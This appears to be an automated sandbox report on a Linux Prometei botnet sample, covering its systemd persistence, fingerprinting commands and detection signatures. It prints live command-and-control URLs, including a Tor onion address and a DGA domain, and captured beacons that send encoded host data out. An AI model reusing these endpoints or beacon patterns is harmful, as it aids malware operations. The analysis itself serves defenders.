Create Interactive Tour

Linux Analysis Report
na.elf

Overview

General Information

Sample name:	na.elf
Analysis ID:	1648484
MD5:	e2d5c1f255db046b94090a92b2aa672f
SHA1:	a382b70baa2fc7e898e5c8ad62d232194df5a124
SHA256:	bd8b8e66915f4ca94ed557d8ad246ce4510c77c64ad2351a3f92b75cf752fc6f
Tags:	elfuser-abuse_ch
Infos:

Detection

Prometei

Score:	100
Range:	0 - 100

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Prometei

Drops files in suspicious directories

Executes the "dmidecode" command for reading DMI BIOS info like hardware or serial numbers (indicative of machine fingerprinting or VM-detection)

Found Tor onion address

Sample deletes itself

Sample is packed with UPX

Creates hidden files and/or directories

ELF contains segments with high entropy indicating compressed/encrypted content

Enumerates processes within the "proc" file system

Executes commands using a shell command-line interpreter

Executes the "pgrep" command search for and/or send signals to processes

Executes the "rm" command used to delete files or directories

Executes the "systemctl" command used for controlling the systemd system and service manager

Executes the "uname" command used to read OS and architecture name

HTTP GET or POST without a user agent

Reads CPU information from /proc indicative of miner or evasive malware

Reads CPU information from /sys indicative of miner or evasive malware

Reads system information from the proc file system

Sample contains only a LOAD segment without any section mappings

Sample listens on a socket

Sample tries to set the executable flag

Suricata IDS alerts with low severity for network traffic

Uses the "uname" system call to query kernel version information (possible evasion)

Writes ELF files to disk

Yara signature match

Classification

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1648484
Start date and time:	2025-03-25 21:19:38 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 7s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	na.elf
Detection:	MAL
Classification:	mal100.troj.evad.linELF@0/13@4/0

Runtime Messages

Command:	/tmp/na.elf
PID:	5399
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	Starting... System install...OK
Standard Error:	Created symlink /etc/systemd/system/multi-user.target.wants/uplugplay.service /lib/systemd/system/uplugplay.service.

Process Tree

system is lnxubuntu20

na.elf (PID: 5399, Parent: 5323, MD5: e2d5c1f255db046b94090a92b2aa672f) Arguments: /tmp/na.elf

na.elf New Fork (PID: 5402, Parent: 5399)

sh (PID: 5402, Parent: 5399, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pgrep na.elf"

sh New Fork (PID: 5403, Parent: 5402)

pgrep (PID: 5403, Parent: 5402, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep na.elf

na.elf New Fork (PID: 5408, Parent: 5399)

sh (PID: 5408, Parent: 5399, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pgrep uplugplay"

sh New Fork (PID: 5409, Parent: 5408)

pgrep (PID: 5409, Parent: 5408, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep uplugplay

na.elf New Fork (PID: 5412, Parent: 5399)

sh (PID: 5412, Parent: 5399, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof uplugplay"

sh New Fork (PID: 5413, Parent: 5412)

pidof (PID: 5413, Parent: 5412, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof uplugplay

na.elf New Fork (PID: 5416, Parent: 5399)

sh (PID: 5416, Parent: 5399, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pgrep upnpsetup"

sh New Fork (PID: 5417, Parent: 5416)

pgrep (PID: 5417, Parent: 5416, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep upnpsetup

na.elf New Fork (PID: 5422, Parent: 5399)

sh (PID: 5422, Parent: 5399, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof upnpsetup"

sh New Fork (PID: 5423, Parent: 5422)

pidof (PID: 5423, Parent: 5422, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof upnpsetup

na.elf New Fork (PID: 5430, Parent: 5399)

sh (PID: 5430, Parent: 5399, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl daemon-reload"

sh New Fork (PID: 5431, Parent: 5430)

systemctl (PID: 5431, Parent: 5430, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload

na.elf New Fork (PID: 5435, Parent: 5399)

sh (PID: 5435, Parent: 5399, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable uplugplay.service"

sh New Fork (PID: 5436, Parent: 5435)

systemctl (PID: 5436, Parent: 5435, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable uplugplay.service

na.elf New Fork (PID: 5442, Parent: 5399)

sh (PID: 5442, Parent: 5399, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl start uplugplay.service"

sh New Fork (PID: 5443, Parent: 5442)

systemctl (PID: 5443, Parent: 5442, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start uplugplay.service

systemd New Fork (PID: 5433, Parent: 5432)

snapd-env-generator (PID: 5433, Parent: 5432, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

systemd New Fork (PID: 5440, Parent: 5439)

snapd-env-generator (PID: 5440, Parent: 5439, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

systemd New Fork (PID: 5444, Parent: 1)

uplugplay (PID: 5444, Parent: 1, MD5: e2d5c1f255db046b94090a92b2aa672f) Arguments: /usr/sbin/uplugplay

uplugplay New Fork (PID: 5455, Parent: 5444)

uplugplay New Fork (PID: 5456, Parent: 5455)

sh (PID: 5456, Parent: 5455, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/usr/sbin/uplugplay -Dcomsvc"

sh New Fork (PID: 5457, Parent: 5456)

uplugplay (PID: 5457, Parent: 5456, MD5: e2d5c1f255db046b94090a92b2aa672f) Arguments: /usr/sbin/uplugplay -Dcomsvc

uplugplay New Fork (PID: 5461, Parent: 5457)

sh (PID: 5461, Parent: 5457, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c hostnamectl

sh New Fork (PID: 5462, Parent: 5461)

hostnamectl (PID: 5462, Parent: 5461, MD5: b1245aa6d3c28b5d5fedb2d681d32eb9) Arguments: hostnamectl

uplugplay New Fork (PID: 5596, Parent: 5457)

sh (PID: 5596, Parent: 5457, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c hostnamectl

sh New Fork (PID: 5597, Parent: 5596)

hostnamectl (PID: 5597, Parent: 5596, MD5: b1245aa6d3c28b5d5fedb2d681d32eb9) Arguments: hostnamectl

uplugplay New Fork (PID: 5606, Parent: 5457)

sh (PID: 5606, Parent: 5457, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "dmidecode --type baseboard"

sh New Fork (PID: 5610, Parent: 5606)

dmidecode (PID: 5610, Parent: 5606, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode --type baseboard

uplugplay New Fork (PID: 5609, Parent: 5457)

sh (PID: 5609, Parent: 5457, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c uptime

sh New Fork (PID: 5613, Parent: 5609)

uptime (PID: 5613, Parent: 5609, MD5: 3ad70d8e33316ac713bf25c2ddf2fb14) Arguments: uptime

uplugplay New Fork (PID: 5620, Parent: 5457)

sh (PID: 5620, Parent: 5457, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "uname -a"

sh New Fork (PID: 5621, Parent: 5620)

uname (PID: 5621, Parent: 5620, MD5: 4ac7c634c5bec95753c480e9d421dcc2) Arguments: uname -a

uplugplay New Fork (PID: 5624, Parent: 5457)

sh (PID: 5624, Parent: 5457, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "dmidecode --type baseboard"

sh New Fork (PID: 5627, Parent: 5624)

dmidecode (PID: 5627, Parent: 5624, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode --type baseboard

uplugplay New Fork (PID: 5632, Parent: 5457)

sh (PID: 5632, Parent: 5457, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "dmidecode --type baseboard"

sh New Fork (PID: 5633, Parent: 5632)

dmidecode (PID: 5633, Parent: 5632, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode --type baseboard

uplugplay New Fork (PID: 5638, Parent: 5457)

sh (PID: 5638, Parent: 5457, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c dmidecode

sh New Fork (PID: 5639, Parent: 5638)

dmidecode (PID: 5639, Parent: 5638, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode

uplugplay New Fork (PID: 5646, Parent: 5457)

sh (PID: 5646, Parent: 5457, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c uptime

sh New Fork (PID: 5647, Parent: 5646)

uptime (PID: 5647, Parent: 5646, MD5: 3ad70d8e33316ac713bf25c2ddf2fb14) Arguments: uptime

uplugplay New Fork (PID: 5650, Parent: 5457)

sh (PID: 5650, Parent: 5457, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "uname -a"

sh New Fork (PID: 5651, Parent: 5650)

uname (PID: 5651, Parent: 5650, MD5: 4ac7c634c5bec95753c480e9d421dcc2) Arguments: uname -a

systemd New Fork (PID: 5463, Parent: 1)

systemd-hostnamed (PID: 5463, Parent: 1, MD5: 2cc8a5576629a2d5bd98e49a4b8bef65) Arguments: /lib/systemd/systemd-hostnamed

fwupd New Fork (PID: 5599, Parent: 1)

gpgconf (PID: 5599, Parent: 1, MD5: ddc6865fed36b9020dfd6fe9d360ebbb) Arguments: /usr/bin/gpgconf --list-dirs

fwupd New Fork (PID: 5601, Parent: 1)

gpgconf (PID: 5601, Parent: 1, MD5: ddc6865fed36b9020dfd6fe9d360ebbb) Arguments: /usr/bin/gpgconf --list-components

fwupd New Fork (PID: 5603, Parent: 1)

gpg (PID: 5603, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: /usr/bin/gpg --version

fwupd New Fork (PID: 5612, Parent: 1)

gpgsm (PID: 5612, Parent: 1, MD5: 66be603a7085efc7ee3140d2ff597485) Arguments: /usr/bin/gpgsm --version

fwupd New Fork (PID: 5615, Parent: 1)

gpgconf (PID: 5615, Parent: 1, MD5: ddc6865fed36b9020dfd6fe9d360ebbb) Arguments: /usr/bin/gpgconf --version

fwupd New Fork (PID: 5617, Parent: 1)

gpg (PID: 5617, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: /usr/bin/gpg --version

fwupd New Fork (PID: 5626, Parent: 1)

gpg (PID: 5626, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 24 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 26 --import -- -&27

fwupd New Fork (PID: 5635, Parent: 1)

gpg (PID: 5635, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 24 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 26 --import -- -&27

fwupd New Fork (PID: 5641, Parent: 1)

gpg (PID: 5641, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 23 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 25 --verify -- -&26 -&28

fwupd New Fork (PID: 5643, Parent: 1)

gpg (PID: 5643, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 23 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 25 --verify -- -&26 -&28

dash New Fork (PID: 5665, Parent: 3585)

rm (PID: 5665, Parent: 3585, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.kfY4W8g8cA /tmp/tmp.UsnA55A3DA /tmp/tmp.lNnnmoNhXs

dash New Fork (PID: 5666, Parent: 3585)

cat (PID: 5666, Parent: 3585, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /tmp/tmp.kfY4W8g8cA

dash New Fork (PID: 5667, Parent: 3585)

head (PID: 5667, Parent: 3585, MD5: fd96a67145172477dd57131396fc9608) Arguments: head -n 10

dash New Fork (PID: 5668, Parent: 3585)

tr (PID: 5668, Parent: 3585, MD5: fbd1402dd9f72d8ebfff00ce7c3a7bb5) Arguments: tr -d \\000-\\011\\013\\014\\016-\\037

dash New Fork (PID: 5669, Parent: 3585)

cut (PID: 5669, Parent: 3585, MD5: d8ed0ea8f22c0de0f8692d4d9f1759d3) Arguments: cut -c -80

dash New Fork (PID: 5670, Parent: 3585)

cat (PID: 5670, Parent: 3585, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /tmp/tmp.kfY4W8g8cA

dash New Fork (PID: 5671, Parent: 3585)

head (PID: 5671, Parent: 3585, MD5: fd96a67145172477dd57131396fc9608) Arguments: head -n 10

dash New Fork (PID: 5672, Parent: 3585)

tr (PID: 5672, Parent: 3585, MD5: fbd1402dd9f72d8ebfff00ce7c3a7bb5) Arguments: tr -d \\000-\\011\\013\\014\\016-\\037

dash New Fork (PID: 5673, Parent: 3585)

cut (PID: 5673, Parent: 3585, MD5: d8ed0ea8f22c0de0f8692d4d9f1759d3) Arguments: cut -c -80

dash New Fork (PID: 5674, Parent: 3585)

rm (PID: 5674, Parent: 3585, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.kfY4W8g8cA /tmp/tmp.UsnA55A3DA /tmp/tmp.lNnnmoNhXs

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Prometei		No Attribution	https://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html https://cujo.com/iot-malware-journals-prometei-linux/ https://twitter.com/IntezerLabs/status/1338480158249013250 https://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/elf.prometei

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
na.elf	Linux_Trojan_Dofloo_ac3333d1	unknown	unknown	0x5bcdb:$a: 76 77 78 95 5C C9 95 79 7A C9 95 5C C9 41 42 43 5C C9 95 5C 44 45

Dropped Files

Source	Rule	Description	Author	Strings
/usr/sbin/uplugplay	Linux_Trojan_Dofloo_ac3333d1	unknown	unknown	0x5bcdb:$a: 76 77 78 95 5C C9 95 79 7A C9 95 5C C9 41 42 43 5C C9 95 5C 44 45

Memory Dumps

Source	Rule	Description	Author	Strings
5399.1.0000000000401000.00000000004f9000.r-x.sdmp	Linux_Hacktool_Flooder_1a4eb229	unknown	unknown	0x9beb:$a: F4 8B 45 E8 83 C0 01 89 45 F8 EB 0F 8B 45 E8 83 C0 01 89 45 F4 8B
5399.1.0000000000401000.00000000004f9000.r-x.sdmp	Linux_Hacktool_Flooder_f454ec10	unknown	unknown	0xb569:$a: 8B 45 EC 48 63 D0 48 8B 45 D0 48 01 D0 0F B6 00 3C 2E 75 4D 8B
5399.1.000000000052d000.0000000001575000.rw-.sdmp	Linux_Trojan_Dofloo_ac3333d1	unknown	unknown	0x7190db:$a: 76 77 78 95 5C C9 95 79 7A C9 95 5C C9 41 42 43 5C C9 95 5C 44 45
Process Memory Space: na.elf PID: 5399	JoeSecurity_Prometei	Yara detected Prometei	Joe Security
Process Memory Space: na.elf PID: 5399	JoeSecurity_Prometei_1	Yara detected Prometei	Joe Security

Suricata Signatures

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-25T21:22:40.419965+0100	2018141	1	A Network Trojan was detected	54.170.242.139	80	192.168.2.13	60504	TCP

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-25T21:22:40.419965+0100	2037771	1	A Network Trojan was detected	54.170.242.139	80	192.168.2.13	60504	TCP

ET MALWARE Prometei Botnet CnC DGA - xinchao Pattern

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-25T21:22:39.352832+0100	2044560	1	A Network Trojan was detected	192.168.2.13	35046	8.8.8.8	53	UDP
2025-03-25T21:22:39.460768+0100	2044560	1	A Network Trojan was detected	192.168.2.13	60773	8.8.8.8	53	UDP
2025-03-25T21:22:39.569107+0100	2044560	1	A Network Trojan was detected	192.168.2.13	40957	8.8.8.8	53	UDP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-25T21:20:35.730994+0100	2803305	3	Unknown Traffic	192.168.2.13	34314	152.36.128.18	80	TCP
2025-03-25T21:20:37.950927+0100	2803305	3	Unknown Traffic	192.168.2.13	34316	152.36.128.18	80	TCP
2025-03-25T21:22:40.158987+0100	2803305	3	Unknown Traffic	192.168.2.13	60504	54.170.242.139	80	TCP

Joe Sandbox Signatures

• AV Detection
• Bitcoin Miner
• Networking
• System Summary
• Data Obfuscation
• Persistence and Installation Behavior
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• Language, Device and Operating System Detection
• Stealing of Sensitive Information

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: na.elf

Avira: detected

Antivirus detection for dropped file

Source: /usr/sbin/uplugplay

Avira: detection malicious, Label: LINUX/GM.Agent.JQ

Multi AV Scanner detection for submitted file

Source: na.elf	Virustotal: Detection: 36%			Perma Link
Source: na.elf	ReversingLabs: Detection: 47%

Bitcoin Miner

Yara detected Prometei

Source: Yara match

File source: Process Memory Space: na.elf PID: 5399, type: MEMORYSTR

Source: /usr/sbin/uplugplay (PID: 5457)

Reads CPU info from proc file: /proc/cpuinfo

Jump to behavior

Source: /usr/bin/pgrep (PID: 5403)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/bin/pgrep (PID: 5417)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5457)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/bin/uptime (PID: 5613)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/bin/uptime (PID: 5647)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044560 - Severity 1 - ET MALWARE Prometei Botnet CnC DGA - xinchao Pattern : 192.168.2.13:35046 -> 8.8.8.8:53
Source: Network traffic	Suricata IDS: 2044560 - Severity 1 - ET MALWARE Prometei Botnet CnC DGA - xinchao Pattern : 192.168.2.13:60773 -> 8.8.8.8:53
Source: Network traffic	Suricata IDS: 2044560 - Severity 1 - ET MALWARE Prometei Botnet CnC DGA - xinchao Pattern : 192.168.2.13:40957 -> 8.8.8.8:53

Found Tor onion address

Source: na.elf, 5399.1.000000000052d000.0000000001575000.rw-.sdmp	String found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi
Source: na.elf, 5399.1.000000000052d000.0000000001575000.rw-.sdmp	String found in binary or memory: nNhttp://152.36.128.18/cgi-bin/p.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgihttp://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi/usr/sbin/uplugplay/etc/uplugplay/etc/CommIdcrashed.dump/usr/sbin//etc/msdtcmsdtc2msdtc3/etc/pcc0/etc/pcc1pbdebug

Source: global traffic	HTTP traffic detected: GET /cgi-bin/p.cgi?r=23&i=97A85012XX91KDE3 HTTP/1.0Host: 152.36.128.18
Source: global traffic	HTTP traffic detected: GET /cgi-bin/p.cgi?add=aW5mbyB7DQp2NC4wMlZfVW5peDY0DQpnYWxhc3NpYQ0KDQoyeCBJbnRlbChSKSBYZW9uKFIpIFNpbHZlciA0MjEwIENQVSBAIDIuMjBHSHoNCjMwNjQyOTYga0INCnZtd2FyZQ0KDQoNCg0KVWJ1bnR1ICYgMjAuMDQuMiBMVFMgKEZvY2FsIEZvc3NhKSAgJiBidWxsc2V5ZS9zaWQgJiANCg0KL3Vzci9zYmluLw0KIDE1OjIwOjM2IHVwIDIgbWluLCAgMSB1c2VyLCAgbG9hZCBhdmVyYWdlOiAyLjkxLCAxLjI1LCAwLjQ3fDE3NDI5MzQwMzYNCkxpbnV4IGdhbGFzc2lhIDUuNC4wLTcyLWdlbmVyaWMgIzgwLVVidW50dSBTTVAgTW9uIEFwciAxMiAxNzozNTowMCBVVEMgMjAyMSB4ODZfNjQgeDg2XzY0IHg4Nl82NCBHTlUvTGludXgNCn0NCg__&i=97A85012XX91KDE3&h=galassia&enckey=SvY5g6wZpBYLQgI8A8T2weHPQGJdj4JlHIpxiOcYrqb3S/H+UhZO7mowCy2Dzftt4L5GaXMixpFcmFxnztbLiX9LTKfVBYHj8tdw8zdeIP+mMMR89wfCv8f97M3U94r5T/9WWmgabhbtaXfn3qVY/YYIuZfuxVzbkteS2nVxDwc= HTTP/1.0Host: 152.36.128.18
Source: global traffic	HTTP traffic detected: GET /cgi-bin/p.cgi?r=0&auth=hash&i=97A85012XX91KDE3&enckey=SvY5g6wZpBYLQgI8A8T2weHPQGJdj4JlHIpxiOcYrqb3S/H-UhZO7mowCy2Dzftt4L5GaXMixpFcmFxnztbLiX9LTKfVBYHj8tdw8zdeIP-mMMR89wfCv8f97M3U94r5T/9WWmgabhbtaXfn3qVY/YYIuZfuxVzbkteS2nVxDwc_ HTTP/1.0Host: xinchaocfcfda.net

Source: /usr/sbin/uplugplay (PID: 5457)

Socket: 0.0.0.0:89

Jump to behavior

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.13:34316 -> 152.36.128.18:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.13:60504 -> 54.170.242.139:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.13:34314 -> 152.36.128.18:80
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.170.242.139:80 -> 192.168.2.13:60504
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.170.242.139:80 -> 192.168.2.13:60504

Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 54.247.62.1
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.2.49

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: wget/1.20.3-1ubuntu1 Ubuntu/20.04.2/LTS GNU/Linux/5.4.0-72-generic/x86_64 Intel(R)/Xeon(R)/Silver/4210/CPU/@/2.20GHz cloud_id/noneAccept: /Accept-Encoding: identityHost: motd.ubuntu.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cgi-bin/p.cgi?r=23&i=97A85012XX91KDE3 HTTP/1.0Host: 152.36.128.18
Source: global traffic	HTTP traffic detected: GET /cgi-bin/p.cgi?add=aW5mbyB7DQp2NC4wMlZfVW5peDY0DQpnYWxhc3NpYQ0KDQoyeCBJbnRlbChSKSBYZW9uKFIpIFNpbHZlciA0MjEwIENQVSBAIDIuMjBHSHoNCjMwNjQyOTYga0INCnZtd2FyZQ0KDQoNCg0KVWJ1bnR1ICYgMjAuMDQuMiBMVFMgKEZvY2FsIEZvc3NhKSAgJiBidWxsc2V5ZS9zaWQgJiANCg0KL3Vzci9zYmluLw0KIDE1OjIwOjM2IHVwIDIgbWluLCAgMSB1c2VyLCAgbG9hZCBhdmVyYWdlOiAyLjkxLCAxLjI1LCAwLjQ3fDE3NDI5MzQwMzYNCkxpbnV4IGdhbGFzc2lhIDUuNC4wLTcyLWdlbmVyaWMgIzgwLVVidW50dSBTTVAgTW9uIEFwciAxMiAxNzozNTowMCBVVEMgMjAyMSB4ODZfNjQgeDg2XzY0IHg4Nl82NCBHTlUvTGludXgNCn0NCg__&i=97A85012XX91KDE3&h=galassia&enckey=SvY5g6wZpBYLQgI8A8T2weHPQGJdj4JlHIpxiOcYrqb3S/H+UhZO7mowCy2Dzftt4L5GaXMixpFcmFxnztbLiX9LTKfVBYHj8tdw8zdeIP+mMMR89wfCv8f97M3U94r5T/9WWmgabhbtaXfn3qVY/YYIuZfuxVzbkteS2nVxDwc= HTTP/1.0Host: 152.36.128.18
Source: global traffic	HTTP traffic detected: GET /cgi-bin/p.cgi?r=0&auth=hash&i=97A85012XX91KDE3&enckey=SvY5g6wZpBYLQgI8A8T2weHPQGJdj4JlHIpxiOcYrqb3S/H-UhZO7mowCy2Dzftt4L5GaXMixpFcmFxnztbLiX9LTKfVBYHj8tdw8zdeIP-mMMR89wfCv8f97M3U94r5T/9WWmgabhbtaXfn3qVY/YYIuZfuxVzbkteS2nVxDwc_ HTTP/1.0Host: xinchaocfcfda.net

